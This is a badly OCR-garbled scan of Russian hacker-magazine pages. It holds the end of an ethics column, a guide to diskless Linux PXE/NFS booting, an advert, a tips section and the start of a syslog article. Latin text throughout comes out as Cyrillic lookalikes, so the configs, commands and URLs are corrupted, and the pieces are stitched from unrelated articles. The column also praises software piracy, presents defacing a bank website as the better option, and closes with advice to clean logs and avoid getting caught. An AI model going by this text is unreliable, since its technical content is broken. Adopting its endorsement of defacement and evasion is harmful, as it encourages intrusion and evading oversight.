тивация, и люди, сознательно наносящие вред ради мате- 
риальной выгоды, не вызывают у меня уважения и доверия. 
Хотя не спорю, жизнь может припереть так, что украдешь у 
родной бабушки. Не вызывают уважения люди, которые бе- 
рут деньги за взлом просто из жадности. Вот, например, 
наши любимые мелкомягкие. Казалось бы, БГ уже самый богатый чело- 
век на Земле. Ну куда ж ему еще??? Неужели человеческая жадность не 
имеет пределов? Вот пример. Я хотела открыть свой интернет-клуб. Все 
посчитала, выбрала место и придумала название. Но потом, подсчитав 
затраты на приобретение лицензий, ужаснулась и забросила эту идею. 

Конечно, можно было открыть свой никсовый клуб, но это пока экзоти- 
ка для обычных ушастых юзеров. Можно открыть подпольный клуб, но 
первое же посещение клуба «органами» может не только влететь в копе- 
ечку, но и окончиться сидением за решеточкой. Вот поэтому, когда у 
Билли гадость, у тети - радость. И я благодарна пиратам, ворующим 
винды. Ате, кто говорит, что они сломаны криво, могут идти далеко и на- 
долго, т.к. лицензионная винда такое же глючное фуфло, что и ворован- 
ная. Если бы не люди, которые тырят проги у буржуев, а потом продают 
по 60 рублей, я, наверное, вообще никогда не подошла бы к компьютеру. 

Мне не нравятся жадные корпорации, типа мелкомягких. Потому 
что весь мир подсажен на их продукцию и вынужден постоянно тра- 
титься на ее обновление и латание дыр. Можно долго ругать Билла 
Гейтса, может, он хреновый программер, но, имхо, он - гениальный 
стратег и менеджер. Видишь ли, высшее искусство менеджера - это 
не работать самому, а заставить других работать на себя, причем так, 
чтобы они получали от этого удовольствие. 

Когда-то и Билли, вероятно, сидя в гараже, мечтал создать что-то хоро- 
шее и полезное. Вероятно, у него была светлая цель, но, как мы видим, 
жадность взяла свое. Мне кажется, у хакера, как и у любого человека, 
должна быть мораль и какая-то этика. Допустим, у меня был счет в банке. 
Я - хорошая, законопослушная тетя, которая всю жизнь откладывала по 3 
рубля с зарплаты на покупку новой Оки. И тут кто-то ломает банк и тырит 
оттуда все деньги, в том числе и мои. Ты думаешь, после такого я продол- 
жу писать сюда? Вряд ли. Скорее всего, я люто возненавижу всех компью- 
терных хулиганов. К чему я это? К тому, что, наказывая жадную корпора- 
цию, нужно думать и о случайных жертвах, которые не виноваты в том, что 
админ банка лох. Лично мне приятны хакеры, которые умеют разумно 
пользоваться данной им властью. Я не имею в виду «синдром Робин Гуда» 
а-ля «укради у богатого и отдай бедным». По-моему, продуктивнее просто 
дефейснугь сайт того же банка, указав админу на дыру. 

А исподтишка упереть деньги как минимум не этично. Это же как 
конфету у ребенка отобрать. Неужели не хочется иметь сильного про- 
тивника? 



Если бы я была хакером, то прежде чем делать что-то незаконное, 
я бы подумала, готова ли я нести ответственность за свои действия. Я 
не воспринимаю всерьез скрипткиддисов. По сути, это дети, играю- 
щие в компьютерное хулиганство и не несущие ответственности за 
свои действия. А при возникновении проблем, как правило, плачут и 
прячутся за мамину юбку. 

Кончилась эпоха романтического хака, так красиво и сладко пока- 
занная в известном фильме «Хакеры». Сейчас главнейшую роль игра- 
ют товарно-денежные отношения. Меня такое положение дел напряга- 
ет, т.к. я, конечно, очень романтическая тетя =). 

Вероятно, кончились Джонни Ли Миллеры, и остались жадные 
компьютерные гении. Никого не напоминает? Да-да, твоего любимого 
БГ. Мне не хотелось бы, чтобы честь хакера продавалась за деньги. 
Может быть, кто-то засмеется, увидев словосочетание «честь хакера». 
Уверяю тебя, такая вещь существует. 

Вот тебе пример: у меня есть сайт (не скажу какой а_то завалите. 
Хи-хи). Я по доброте душевной сделала фтп-акк одному пациенту. Паци- 
ент взял и поюзал для аплоада файлов какую-то прогу, которая на деле, 
конечно, оказалась трояном. Прога выслала логин и пароль одному хаке- 
ру. Сетевой беспределыцик мог бы похерить мою коллекцию ппрЗ, статей 
и фоток. Но хакер этого не сделал, а вместо этого связался со мной 
и по-честному все рассказал. Собственно, чего стоило бы завалить сайт, 
имея логин и пасс к одному из аккаунтов? Ничего. Но человек не стал 
этого делать. Вот это и есть проявление чести хакера. Такие люди вызы- 
вают у меня искреннее уважение. 

Деньги сейчас на первом месте почти во всех сферах жизни. Очень пе- 
чально, что эта неприятная тенденция постепенно добирается и до компь- 
ютерного сообщества. Мне бы хотелось, чтобы хакер оставался независи- 
мым, ответственным андеграундным персонажем, окутанным неким орео- 
лом романтики. Сейчас же многие проекты «продались» за рекламу, стали 
какими-то попсовыми, вешают непроверенные левые новости и т.д. 

Мне не хочется, чтобы хак-культура стала попсовой машиной для 
зарабатывания денег и дешевых авторитетов. Не потому что плохо 
быть богатым, а потому что, как показывает практика, деньги портят 
человека, и такие понятия, как честь и достоинство, меняются на 
хрустящие купюры. Все хотят богатства и славы. Вспомни, ведь еще 
несколько лет назад никто в России не знал, кто такой хакер. Теперь 
все знают, по телику уже говорят о том, что скоро хакеры захватят 
ядерные объекты и устроят войну. Уходит романтика и андеграунд. Не 
пора ли вспомнить об истоках? Об элитности, чести и достоинстве. 
Деньги приходят и уходят. Согласись, в старости будет приятно ду- 
мать о себе как о человеке чести, а не о мешке с деньгами.]^ 

Чисти логи 2 раза в день , не попадайся и помни об ответственности. 
Всех целую, 

Ваша тетя Джина. 
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П дея создания бездисковой станции с загрузкой по Сети дапеко не нова. Уже десятилетиями применяется это удобное и безопасное 
решение. Представь, что в предельно короткие сроки без заморочек с клонированием винчестеров тебе нужно установить любую 
операционку на сотню-другую одинаковых машин. Сервер удаленной загрузки сведет эту операцию к загрузке Ііпих по сети, а 
далее к поблочному копированию на локальный винчестер образа один раз установленной и настроенной ОС. Все, что нужно - это 
поддержка сетевой карточкой возможности загрузки по сети и наличие соответствующей опции в ВІ08. 



СОЖНЕМ пингвина но бездисковую станцию 




^ КПРТОЧНЫЕ ИГРЫ 

в дистрибутивы 

С уществует несколько специфи- 
каций прошивок (ВОМ) сетевых 
карт для загрузки по сети. Са- 
мая популярная из них - это 
ІпіеІ РХЕ (Рге-Ехесиііоп 
Епѵігоптепі). Твоя карточка ли- 
бо уже прошита соответствую- 
щим образом, либо имеет воз- 
можность (микросхему), но не имеет про- 
шивки. В таком случае тебе нужно будет по- 
искать подходящую прошивку на пейооі.зі.пеі. 

В этой статье и сервер, и бездисковый 
клиент будут работать под ОС Шлих. В опи- 
сании я использую дистрибутив ЗІаскѵгаге 
Ипих, так как он больше остальных подходит 
для наших нужд, но все описанное вполне 




^ѵѵѵш.ІШр.огд 
а ѵшѵѵ.ізс.огд 

а тки.кегпеІ.огд/риЬ/зоПиаге/пе1иогк/Шр/ 
А нузііпих .гуіог .сот 
а еІІіегЬооІ.огд 
а пеІЬооІ.зоигсеІогде.пеІ 



применимо к любому дистрибутиву с незна- 
чительными изменениями в расположении 
конфигурационных файлов и управляющих 
скриптов. Ядро будем грузить по сети, а 
корневая файловая система будет монтиро- 
ваться по пГз. Таким образом, наличие како- 
го-либо носителя информации на клиенте 
не обязательно. В итоге мы получим полно- 
ценную бездисковую Ппих-машину, с рабо- 
чим ядром и файловой системой. 

^УОППЕННПЯЗПГРУЗКП 
ПОД ПРИЦЕПОМ 

Для начала нам понадобится сервер удален- 
ной загрузки. Это может быть Ьооір-сервер 
или ббср-сервер, оба они выполняют необ- 
ходимые функции. Т.к. протокол сйіср умеет 
все то же, что и Ьооір, только больше и луч- 
ше :), то нет никакого резона использовать 
Ьооір-сервер. Поэтому качаем и ставим І5С 
РНСР сервер, последняя версия которого на 
момент написания статьи - З.О.ІгсІЗ. Про- 
токол сІТіср позволяет намного больше, чем 
просто раздачу ІР-адресов. Нам нужно будет 
не только "оформиться" у сервера, но и заг- 
рузить с сервера ядро. Сам сіііср не умеет 
предоставлять файлы, для этого использу- 
ется Шр (ігіѵіаі Гііе ігапзроіі ргоіосоі) - уре- 



занный, по сравнению с Йр, протокол, не 
имеющий авторизации и работающий по 
ибр. Также нам необходимо скачать и поста- 
вить поддерживающий команду Ізйе Шр- 
сервер, к примеру, бра-Шр. И то и другое 
требует конфигурирования. Рбср-сервер чи- 
тает все настройки из файла 
/еіс/ббсрб.сопй 



КОНФИГ /еіс/бІтсрб.сопГ 



аііоѵ» Ьооііпд; 
аііоиі Ьооір; 

# Глобальные опции 
орііоп ботаіп-пате "пииОс.Іап"; 
орііоп Ьгоабсаоі-абіігеьа 192.168.1.255; 
орііоп зиЬпеІ-тазк 255.255.255.0; 
беГаиІНеаае-Ііте -1; 
изе-йозЫесІ-патез ол; 
Мпі-ирбаіе-аіуіе аб-бос; 

(ІІепате "рхеііпих.0"; 

К Опции для подсети 
зиЬпе1 192.168.1.0 пеішаак 255.255.255.0 
галде 192.168.1.10 192.168.1.30; 
орііоп гоиіегз 192.168.1.1; 
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ТОНКИЕ КЛИЕНТЫ ПОДРУЧНЫМИ СРЕДСТВЯМИ 




Ядро будем грузить по сети, а корневая фай- 
ловая система будет монтироваться по пТ$. 



Запуск демона происходит следующим 
образом: 

# /изг/зЬіп/аіісра -с< /еіс/ййсрй.сопі 

Мрб конфигурационного файла не имеет 
и просто запускается в безопасном режиме 
/изг/зЬіп/іп.ШрсІ -з /МрЬооі, где /МрЬооі - 
предварительно созданная директория, куда 
мы положим ядро и прочие необходимые 
файлы (см. ниже). Запущенный с аргумен- 
том -з, Мрб использует системный вызов 
сЬгооІ(2) в указанный каталог, поэтому ос- 
тальным программам мы должны указывать 
пути к файлам на Шр относительно этого ка- 
талога. Параметр -I запускает МрЬ в зіапсі- 
аіопе режиме. Таким образом, нам уже не 
нужно использовать устаревший іпеМ для 
запуска Шр-сервера. Замечу, что Ыісрсі и 
МрЬ даже могут находиться на разных ма- 



шинах. Для этого в конфиг Ыісрсі. сопі следу- 
ет добавить запись: 

пехі-зегѵег ад.рес.М1рй.сервера 

Но, как правило, все сервисы вешают на 
одну машину. Оба сервиса можно прописать 
в /еТс/гс . сі/гс . I оса I для запуска при старте 
системы: 

есПо "Ыагііпд ІЗС РПсрР: /изг/зЬіп/сІІісрй" 

/изг/зЫп/РРсріІ -с( /еІс/сІІісрй.сопЕ > /Йеѵ/пиіі 2>51 
есію "Зіагііпд зесиге Нірй: /изг/зЬіп/іп.ІНрсІ" 

/рагЙіп/іп.КІрй -I -а /Йріюоі 

А ВЫПЕКПЕМ ЯДРО 

Собственно, а что нам надо грузить? В кон- 
фиге Ыісрсі. сопі среди прочих видим строчку: 

Еііепате "рхеііпих.0"; 



ПЕРЕВОДИМ ІР-РДРЕС В НЕК 

К ак известно, запись адреса десятичными числами в четыре 
октета (192.168.1.2) используется исключительно для удоб- 
ства восприятия. ІР-адрес в протоколе четвертой версии 32- 
битный, система воспринимает его, разумеется, в двоичном 
виде. То есть четыре октета превращаются в четыре части од- 
ного числа, состоящего из нулей и единиц, по 8 бит каждая. 
Итого - число длиной 32 бита. Почему по восемь? Да потому что 
максимальное значение октета 255 - это как раз восемь единиц 
в двоичном виде. Если значение октета в двоичном виде не до- 
тягивает до восьми знаков, его дополняют нулями слева. Итого 
192.168.1.2 превращается в 

11000001010100000000000100000010. Полученный кошмар 
нужно просто перевести в шестнадцатеричный вид. Это будет 
С1 500102. Для переводов бес -> Ьіп и Ьіп -> ііех используй каль- 
кулятор, бумажку или считай в уме :). 




Это значит, что мы будем использовать 
рхеііпих - модификацию всем известного 
загрузчика зузііпих от Питера Анвина (Реіег 
Апѵіп), специально созданную для загрузки 
по сети. Берем на зузііпих.гуіог.согп свежий ар- 
хив зузііпих, в нем находим искомый файл- 
загрузчик рхеііпих.0, помещаем его в /Мр- 
ЬооІ и в конфиге Ыісрсі указываем путь до 
файла относительно этого каталога (напом- 
ню, что МрЬ запущен в безопасном режиме, 
и для него /МрЬооІ - это корневой каталог) 

- ІІІепате "рхеііпих.0 1 ';. Именно поэтому нам 
нужен был Мрб-сервер с поддержкой коман- 
ды ізііе - рхеііпих использует ее, чтобы ска- 
чать образ свежеиспеченного ядра: 

# ей /и5г/$гс/Ііпих-2.4.24 

# паке теписопбд 

# таке Йер сіеап кіітаде 

Опционально: 

# таке тойиіез тойиІе$_іп$ІаІІ 

Общие рекомендации по сборке: для уда- 
ленной загрузки удобно собирать ядро без 
модулей, например, у меня все необходимое 
влезло в 1 200 Кб, но это несущественно. 
Главное вкомпилировать в ядро (НЕ как мо- 
дули) следующие вещи: поддержку ТСР/ІР, 
драйвер сетевой карты бездисковой маши- 
ны, опции "піз-клиент" и "піз-зегѵег", опцию 
"аііоѵѵ піз гооГ, монтирование корневой пГз 
при загрузке, поддержку сІеѵГз и сІеѵГз шоипі 
а( Ьооі. Одним словом, прикинь, что нужно 
ядру, которое грузится на совершенно голой 
машине, и при этом должно видеть сеть и 
уметь монтировать піз-разделы при загруз- 
ке. 

Итак, в /МрЬооІ у нас уже лежит файл 
рхеііпих.0 из архива зузііпих и наше ядрышко 
для бездисковых станций, пусть оно будет 
незатейливо называться Ьхітаде. Давай 
мысленно прокрутим ситуацию и подумаем, 
чего еще нам не хватает. Когда мы выставим 
в ВІОЗ клиентской машины опцию загрузки 
по сети, рхе-загрузчик пойдет искать дос- 
тупные Ыіср-серверы, наш Ыісрсі откликнет- 
ся, выдаст клиенту файл рхеііпих.0, этот 
файл загрузится, загрузит ядро Ьгіпладе, яд- 
ро пойдет грузиться, а потом... а потом оно 
очень хотело бы увидеть корневую файловую 
систему, монтируемую по сети. Кроме того, 
рхеііпих должен иметь конфигурационный 
файл, где описано, какое ядро и с какими 
опциями ему грузить. 



а На Хакер СО ты 
найдешь весь 
софт, который был 
упомянут в статье. 
А именно: послед- 
ние версии ядер и 
прошивок сетевых 
карт, І$С РНСР, 
Нра-Шр, загрузчик 
зузііпих. 




Полезные 

справочные 

страницы: 



а тап п!з 
л тап іп.ШрсІ 
л тап сІКісрс! 
л тап сііісрсі.сопі 
л тап рогітар 




а При использова- 
нии опции азупс 
увеличивается как 
производитель- 
ность, так и веро- 
ятность потери 
данных. 
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3 Тесты новейших моделей ноутбу-ков, 
карманных компьютеров и сотовых 
телефонов 

Читайте в номере: НР ІРАСЗ И4150, ЮОХ 610 
ВТЛЛ/ЬАЫ, 50ЫѴ СНЕ РЕС ТЭ35, АСЕР пЮ, 
ОЕИ АХІМ ХЗІ, ЕСТАСО РаПпег Х8, РоѵегРС 
Р5+, МахЗеІесі А4, КОѴЕК Т21 ОѴѴ, АСЕР 
ТгаѵеІМаІеббО, МОТОРОІА Ѵ500, ЕТЕМ Р300, 

замзшс хбоо, рніирз э@э++ 

3 Ноутбук для геймера 

Что наша жизнь? Игра! Выбираем мобиль-ный 
компьютер для игровых приложений 



3 Камера для карманника 

Многие современные карманные компьютеры 
комплектуются встроенными цифровыми 
фотокамерами. Какова их полезность на 
практике вы можете узнать из нашего 
независимого теста 



3 Как "растянуть" аккумулятор 

Новый цикл статей - "трюки с мобильным 
телефоном"! Учимся использовать скрытые 
возможности сотовых аппаратов 

3 КПК - фотолаборатория 

РРоіозНор на карманном компьютере - не новость. 
Наши эксперты расскажут вам о том, как 
редактировать и обрабатывать цифровые 
фотографии на Роскеі РС и Раігп ОЗ 



3 А также полезные советы в рубрике 
"Шаг за шагом" 

Как управлять настольным компьютером с КПК, 
антивирус для Роскеі РС, программи-руем на 
ЗтаІІВАЗІС, как синхронизиро-вать М3 Оиііоок 
и Раіт 05, Интернет про запас - технология 
МоЬІІе Раѵогііез 



тс 



МОБИЛЬНЫЕ 

КОМПЬЮТЕРЫ 



ітш@и 




^НЕТРИВИРПЬНЫЙШШПШР 

Последняя по порядку, но не по важности 
вещь в каталоге /ШрЬооі - папка 
/ШрЬооІ/рхеІіпих.сГд/, где будет располагать- 
ся конфигурационный файл с именем “ай- 
пишник клиента”. Мы ведь хотим, чтобы раз- 
ные бездисковые клиенты с разной конфигу- 
рацией железа могли грузить разные ядра, 
верно? И как дать каждому клиенту понять, 
где его ядро? Для каждого клиента создает- 
ся файл /ШрЬооі/рхеІіпих.сід/ХХХХ, где имя 
ХХХХ файла - это ІР-адрес клиента в шест- 
надцатеричной форме. Т.е. для клиента с ад- 
ресом 192.0.2.91 это будет конфиг /Шр- 
ЬооѴрхе I і п ЦХ/С000025В . Наконец, если ни 
один из конфигов не подойдет, то рхеііпих 
читает /ШрЬооі/рхеІіпих/сіеіаиІІ. 

Возникает вопрос: откуда у клиента бе- 
рется конкретный адрес? Как мы помним, у 
нас используется ббср-сервер, и от выпол- 
нения своей прямой миссии - динамически 
выдавать ІР-адреса - он не отказывается. 
Клиент и получает от этого сервера адрес, за 
это отвечают следующие строчки 
/еіс/ббсрсі.сопі: 



Исходя из того, что сетевая карта у клиен- 
та не меняется, ее МАС-адрес и будем ис- 
пользовать. Мы указываем, что клиенту с 
МАС-адресом 00:0С:6Е:9О:6Р:78 всегда нуж- 
но назначать ІР-адрес 192.168.1.20. Затем 
переведем этот адрес в шестнадцатеричный 
вид и положим конфиг с таким именем в 
/ІГІрЬооІ/рхеІіпих.сГд/. Вуаля! Оговорюсь, что 
у меня все 72 бездисковых клиента были 
одинаковые, и различать их каким-либо об- 
разом не было нужды (опции Іюзі вообще в 
конфиге не было, а в рхеііпих.сід лежал один 
лишь беіаиіі). 

Итак, сам конфиг (в моем случае - /Шр- 
ЬооІ/рхеІіпих.сід/беІаиІІ): 

ІаЬеІ Ііпих 
кегпеі Ьгітаде 
аррепО ір=шіІо 

аррелО п($гоо1=192.168.1.1:/Ііопіе/пІ5гоо1 
ірарреікіі 

Здесь ничего сложного нет: синтаксис 
практически совпадает с синтаксисом 
ІІІо.сопі, за исключением того, что пара 
"имя-значение" отделена пробелом, а не 



1 Мы ведь хотим, чтобы разные бездисковые 1 
клиенты с разной конфигурацией железа 
, могли грузить разные ядра, верно? , 



МЛсрФсопГ В БОЕВЫХ УСЛОВИЯХ 



II выдавать клиентам такое имя домена 
орііоп йотаіп-паліе "хакер.Іап"; 

II пусть клиенты знают широковещательный адрес сети 
орііоп Ьгоагісазі-аОагезз 192.168.1.255: 

II пусть клиенты знают маску подсети 
орііоп зиЬпеІ-тазк 255.255.255.0: 

II описание подсети, в которой мы живем 
аиЬпе1 192.168.1.0 пеілшк 255.255.255.0 
II диапазон назначаемых адресов 
гапде 192.168.1.10 192.168.1.30: 

II сообщим клиентам, какие роутеры надо добавить в табли- 
цу маршрутизации 
орііоп гоиіетз 192.168.1.1: 

II а также какие бпз-сервера им нужно прописать себе в 
/е(с/ге$оІѵ.соп( 

орііоп лаіле-зегѵегз 192.168.1.10: 



В итоге получаем клиента с полностью 
сконфигурированной сетью. 

^каждому свое ядро 

Очевидно, что адрес клиенту в данной кон- 
фигурации назначается случайным образом 
из имеющихся свободных. Но нам может по- 
надобиться, чтобы клиент А получал ядро 
кегпА, а клиент В - ядро кегпВ. Это значит, 
что у клиентов А и В каждый раз должны 
быть строго фиксированные адреса. К 
счастью, сііісрб и это умеет. В секцию зиЬпе! 
пишем: 

ітозі еіітбооі 

ііапіиаге еіітегпеі 00:0С:6Е:9й:6Р:78: 

Гіхей-айгігезз 192.168.1.20; 



знаком равенства (=). Клиенту будет выдано 
по Мр ядро Ьгітаде, ІР-адрес клиенту уже 
присвоен сЛюр-сервером, а корневая файло- 
вая система должна быть примонтирована по 
піз с сервера 1 92. 1 68. 1 . 1 . Эти параметры 
буду переданы ядру при загрузке. 

А ТОНКОСТИ ТОНКИХ КЛИЕНТОВ 

Осталось последнее - поднять и настроить 
піз-сервер, а также экспортировать клиентам 
файловую систему, достаточную для нор- 
мальной работы. О том, как настроить піз, 
подробно рассказывается в ІЯРЗ-НоѵѵТо. В 
случае дистрибутива ЗІаскѵѵаге нужно уста- 
новить пакеты пГз-цЫз и роПтар, и сервер 
будет запускаться/останавливаться скриптом 
/еІс/гс.гі/гс.пЫ. Допустим, нашу корневую 
файловую систему, которую мы будем экс- 
портировать клиентам, мы решили создать в 
/Іюте/пізгооі. За основу можно взять суще- 
ствующую із, скопировав в /Тюте/пізгооі 
следующие каталоги: Ып, беѵ, еіс, ІІЬ, ргос, 
гооі, зЫп, ітр, изг, ѵаг, боте. Замечу, что 
беѵ и ргос нужно просто создать руками как 
пустые директории. 

Дальнейшая кастомизация всех каталогов 
- целиком на твое усмотрение, вполне воз- 
можно, что ты захочешь получить на клиенте 
совсем другой дистрибутив, тогда возьми 
соответствующие файлы из нужной инстал- 
ляции. Если ядро было собрано с модулями, 
то не забудь поместить их в 
/I і Ь/тосІ и Іез/$ КЕВ N ѴЕЯ (в нашем случае - 
/I і Ь/тосІ и Іез/2 .4.24). Если ты скопировал ос- 
новные конфигурационные файлы в /еіс 
один в один с сервера, то их, конечно, надо 
изменить. В первую очередь изменению 
подвергается Гзіаб: 





А 



192.168.1.1:/Іюте/п($гооІ / п($ [Іе(аііІІ$ О О 

ргос / ргос ргос беішіік О О 

Корневой раздел у нас монтируется по 
піз, так что никаких Іхіа/зсіа в таблице фай- 
ловых систем нет. По этой причине не за- 
будь поднять в "экспортируемом дистрибу- 
тиве" сервис грс.роПтар (пакет роПтар). 
Также, если ты заметил, у нас нет зѵѵар'а, и 
хотя зшр через піз это не лучшая идея, но в 
нашем случае придется ей воспользоваться. 
Создадим в пределах экспортируемой 1з 
файл размером в 64 мегабайта: 

# сМ і1=/беѵ/гего оГ=/(іоте/пГзгооУѵаг/5ѵѵарТіІе Ьз=Ш 

соші!=64 

# сбтой 600 /Іюте/п1$гоо1/ѵаг/$иарІІІе 

Затем в конфигурационных скриптах клие- 
нтской 1з добавим следующие строчки сразу 
после монтирования корневой файловой 
системы (по пТз), либо в гс.іосаі: 

ткзѵѵар /ѵаг/$»ар(ІІе 

$шроп /ѵаг/зшарПІе 

Загрузившись с клиента и выполнив саі 
/ргос/зѵѵарз, мы увидим, что в случае необ- 
ходимости система будет свалиться в соз- 
данный файл. 

Итак, файловая система подготовлена. На 
сервере добавляем в /еіс/ехрогіз: 

/Іюте/пізгооі 

192.168.1.0/255.255.й5.0(гіад$упс,по_гооІ_$чиа$Іі) 

что подразумевает экспортирование 
Дюше/пізгооі машинам из подсети 
192.168.1 .0/24 в асинхронном режиме чте- 
ния-записи, а директива по гооі зциазіі 
предназначена для того, чтобы избавиться 
от проблем с правами доступа к файлам (по 
умолчанию в целях безопасности удаленный 
гооі отображается (тарреб) в виде пользова- 
теля с правами поЬобу). 

А БЕЗДИСКОВОЙ нирвпно 

Если все прошло успешно, ты сможешь наб- 
людать следующую картину: на сервере за- 



пускается ббсрб, Иірб и пізб. Клиент загру- 
жается и посылает широковещательные 
РНСРРіЕОІІЕЗТ'ы, а наш ббср-сервер отвеча- 
ет ему ОНСРОРРЕВ'ом. Иными словами, кли- 
ент и сервер находят друг друга, и сервер 
выполняет директиву "дать клиенту файл 
рхеііпих.0". Тут в игру вступает Щр-сервер, 
который с радостью отдает уже имеющему 
ІР-адрес клиенту нужный файл. Файл загру- 
жается, считывает соответствующий конфи- 
гурационный файл в /ШрЬооІ/рхеІіпих.сІд/ и 
согласно указанным в этом файле настрой- 
кам закачивает нужное ядро, а затем запус- 
кает его на загрузку с соответствующими оп- 
циями. Ядро грузится, и когда дело доходит 
до волшебного момента запуска процесса 
іпіі, оно посылает піз-команду к требуемому 
серверу для монтирования корневого разде- 
ла. Наш піз-сервер отрабатывает запрос, 
предоставляя клиенту Діоше/пізгооі, и кли- 
ент (ядро) продолжает нормальную загрузку. 
Итого имеем полностью сетевую станцию, 
получая всю мощь и возможности Шлих на 
тонких клиентах. Ещоу ;-). 

ТХРЩ^ГРРХСНіБ 



Хочешь увидеть свои советы в журнале? 
Присылай их на адрес $кІуагоѵ@геаІ.хакер.ги. 
Ведущий рубрики ТірзіІТгіскз Иван Скляров. 



л об удалении пад-окна на примере МаіІ ТІіет Рго. Так 
вот, этот совет для тех, кто не хочет возиться с дизас- 
семблерами и отладчиками. Берем любой редактор ре- 
сурсов (Везіогаіог, ПеэН 

Зіпісіп 

іѵа$Іікіп@ѵ$тро.гіі 






ОДОЛЕННЫЙ 
Р0Б0ЧИЙ СТОП 

О дной из прелестей истинно сете- 
вой модели I) N IX является реали- 
зация графической подсистемы. 
Вкратце, она представляет собой 
две основные части: сервер X- 
ѴѴіпсІоѵѵ (например, ХРгее86) и клиент 
ака оконный менеджер, или вообще 
любое графическое приложение, ис- 
пользующее вывод графики на эк- 
ран. Они могут взаимодействовать 
как в рамках одного хоста через ло- 
кальные ипіх-сокеты, так и по сети 
через ТСР/ІР-сокеты. Последнее для 
нас особенно интересно. За прори- 
совку окон, размещение их на экра- 
не, а также всю графическую работу 
отвечает клиент, сервер же тупо от- 
рисовывает что ему передают. Поэ- 
тому, вопреки привычной термино- 
логии, на маломощном тонком кли- 
енте мы можем запустить только X- 
сервер, а оконные приложения за- 
пускать на мощном сервере, и все 
результаты их работы будут выво- 
диться на клиентский сервер. Таким 
образом, мы можем получить полно- 
ценную графическую рабочую среду 
даже на слабом старом компьютере! 
Подробнее про удаленный запуск 
графических приложений читай в 
НетоІе-Х-Аррз-НОѴѴТО на «м.Шр.огд. 
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і Ііпіх-систему, набери рз ѵѵаих, если это Ііпих или В80, или рз -е(, если эта Зоіагіз либо другая реализация Зузіет 
II. Ты увидишь множество процессов, каждый из которых что-то делает. К примеру, это может быть сгоші, іпеіб, піріі, зепбпгаіі, ззіиі 
и еще масса других демонов, а также процессы ядра системы. И что интересно - все они выводят на стандартные потоки данные, 
которые регистрируются системой журналирования. Для чего это нужно? 



СИСТЕМП ЖУРНППИРОВПНИЯ СОБЫТИЙ В ПОДРОБНОСТЯХ 




З то сделано для того, чтобы 
владелец хоста в любой мо- 
мент времени мог узнать, что 
конкретно делает каждый из 
них, а если что-то не работает 
- выяснить, в чем причина. 
Логи - история жизни систе- 
мы, и порой только долгое ко- 
выряние в /ѵаг/Іод помогает выяснить, поче- 
му же вдруг провайдер выставил непомер- 
ный счет за трафик, и что за клоун всю ночь 
долбился на все 65535 портов сервера. 



^ краткая справки 

Традиционно за ведение журналов событий 
отвечает демон зузіодсі, история которого 
корнями уходит в институт Беркли и тамош- 
нюю В5Б. Зузіодсі - нечто большее, чем 
просто демон. Он должен взаимодейство- 
вать со всеми демонами, которые запуще- 
ны в системе, чтобы все они могли прото- 




л шѵт.ЬаІаЬІ1.сот/ргосІисІ8/8у8Іод_пд/ 
л шѵт.сІиеЬу4.огд/тіпіг5у5Іод(І/ 
л зтагсіеп.огд/зоскіод/ 



колировать события. Взаимодействие это 
происходит через специальный сокет 
/беѵ/Іод. Поэтому любой демон, желающий 
оставить память о себе в журнале событий, 
просто пишет в этот файл с определенными 
аргументами. Системный демон зузіодсі за- 
пускается из инициализационных скриптов 
при старте системы. 

Как и у любого уважающего себя демона, у 
зузіодсі есть свой конфигурационный файл. 

По умолчанию это /еіс/зузіод.сопі, однако 
ничто не мешает назвать его как угодно, а по- 
том запускать зузіодсі с ключом Л 
/райі/іо/сопіідіііе. Именно на файл конфигу- 
рации мы обратим свое внимание, а о ключи- 
ках, с которыми можно пускать зузіодсі, мож- 
но узнать из гтш зузіодсі, благо их немного. 

Л КОНФИГУРИРОВПНИЕ ДЕМОНП 

Каждая строчка зузіод.сопі состоит из двух 
записей - правила и действия. В правилах 
указывается, какая подсистема генерирует 
события, а также степень подробности, в 
действиях - что с этими событиями делать. 
На деле все просто. Основных подсистем 
всего двенадцать - аи№і, аиібргіѵ, стоп, гіае- 
топ, кегп, Ірг, таіі, тагк, пеѵге, зузіод, изег, 
ииср, однако на практике в основном ис- 
пользуют следующие из них: аиіб - инфор- 



мация о регистрации пользователя в систе- 
ме ("юзер вася зашел со второй консоли”), 
аиіііргіѵ - информация о повышении приви- 
легий в системе ("юзер вася сделал зи на 
рута на второй консоли"), сгоп - информация 
о выполняющихся по расписанию заданиях 
("в девять утра, как обычно, скрипт опустил 
ГігеѵѵаІІ, и инет у юзеров кончился"), кегп - 
сообщения ядра ("сетевой интерфейс пере- 
шел в рготізсіоиз тосіе"), Ірг - сообщения 
системы печати, таіі - сообщения почтовой 
системы и т.д. 

О назначении подсистемы говорит ее наз- 
вание. Хотя вся эта классификация по боль- 
шому счету условность. Тут нет Йрб, бНрсІ и 
т.д. - и не нужно, так как эти демоны сами 
заботятся о том, сколько и куда писать ин- 
формации. В общем же случае, это дело 
программиста - к какому классу отнести сво- 
его демона и использовать при написании 
соответствующий аргумент для функции 
орепІод(З). 

Степень подробности - то количество ин- 
формации, которое будет обрабатываться. 
Существует восемь классов приоритетов: 
бебид, іпГо, поіісе, ѵѵагпіпд, егг, сгіі, аіеп, 
етегд, каждый последующий - менее ин- 
формативный, чем предыдущий. То есть на 
уровне бебид демон выдает огромное число 
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сообщений, по которым можно восстановить 
его работу во всех подробностях (поэтому 
так и называется - отладочный), уровень 
поіісе - оптимальный (демон выдает только 
значимые сообщения), етегд - только кри- 
тичные для работы системы отметки. 

Наконец, действие - это то, что должен 
совершить зузіодсі, обрабатывая сообщения. 
Действиями могут быть: запись в файл 
(/ѵаг/Іод/Ті Іе . Іод ) - самое популярное, ради 
чего логи и ведутся, но, помимо этого, логи 
могут передаваться на удаленный хост (за- 
пись вида @Іод1юзІ), перенаправляться на 
конвейер другим программам, пересылаться 
определенным пользователям и/или выво- 
диться на консоль (/беѵ/сопзоіе). Под пере- 
дачей логов на удаленный хост имеется в 
виду не что иное, как отправка их на другую 
машину, где также запущен зузіодсі, прослу- 
шивающий 514/ибр порт. 

Также удобно комбинировать подсистемы 
и степень подробности, сопоставляя одному 
из описанных выше действий некий шаблон. 
Запись в каждой строке конфига в общем 
случае выглядит как: 

подсистема1.уровень1:подсистема2.уровень2;подсисте- 

маЗ.уровеньЗ «действие» 

Здесь точкой разделяется соответствие 
уровня протоколирования подсистемы, и 
нескольким таким комбинациям можно со- 
поставить одно действие, разделив их точ- 
кой с запятой. Замечу, что в записи под- 
системаі .уровеньі определяется следую- 
щее: "для подсистемы 1 протоколировать 
все события уровня 1 и выше". Что логич- 
но, если вспомнить, что уровни идут по 
